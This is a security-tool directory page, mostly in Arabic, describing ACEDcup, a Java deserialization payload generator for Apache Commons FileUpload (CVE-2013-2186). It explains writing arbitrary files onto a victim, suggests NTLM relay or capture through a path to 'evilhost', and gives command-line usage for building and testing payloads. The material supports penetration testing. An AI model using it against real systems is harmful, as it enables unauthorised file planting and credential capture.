Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ACEDcup — مُولِّد الحمولة لهجوم إلغاء التسلسل الثنائي في Java باستخدام Commons FileUpload (CVE-2013-2186) | Kitploit
أدوات/GitHubGitHub/grrrdog/acedcup
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubgrrrdog/acedcup

ACEDcup

مُولِّد الحمولة لهجوم إلغاء التسلسل الثنائي في Java باستخدام Commons FileUpload (CVE-2013-2186)

عرض المستودع
3714منذ 10 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ACEDcup

أداة ACEDcup هي مولد حمولة (payload) لهجوم إلغاء التسلسل الثنائي لجافا (ACED)

لـ Apache Commons FileUpload الإصدار <= 1.3 (CVE-2013-2186) و Oracle JDK الإصدار < 7u40

يعمل الهجوم حتى مع الإصدارات الأحدث من المكتبة أو جافا. يمكننا رفع أي محتوى في أي مجلد، لكن لا يمكننا التحكم في اسم الملف (شيء مثل upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp) في هذه الحالة. ومع ذلك، قد يكون مفيدًا في بعض الحالات.

يمكننا أيضًا تنفيذ هجوم ترحيل/اعتراض NTLM (باستخدام \\evilhost\any\path) إذا كان هدفك يعمل بنظام ويندوز.

الاستخدام

root@kitploit:~
  1)At first, we create a serialized payload:
  java -jar aced_cup.jar /path/payload /path/target /path/out 1
  
  /path/payload - a path to a file with your payload
  /path/target - a path to a file that will be created in your victim (this will be stored in the serialized payload)
  /path/out - a path to a file with serialized payload
  0 - turn off null-byte ending if you attack a patched system (with null-byte- by default)

  2)Then we set the serialized payload to the serialized reader (if we want to test the vuln on your host) :
  java -jar ser_reader serialized_payload.txt
  
  ser_reader tries to deserialize the payload and because of a vulnerability in it's library, it creates a new file in the directory specified.

مثال

java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt

```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````

تنزيل الأداة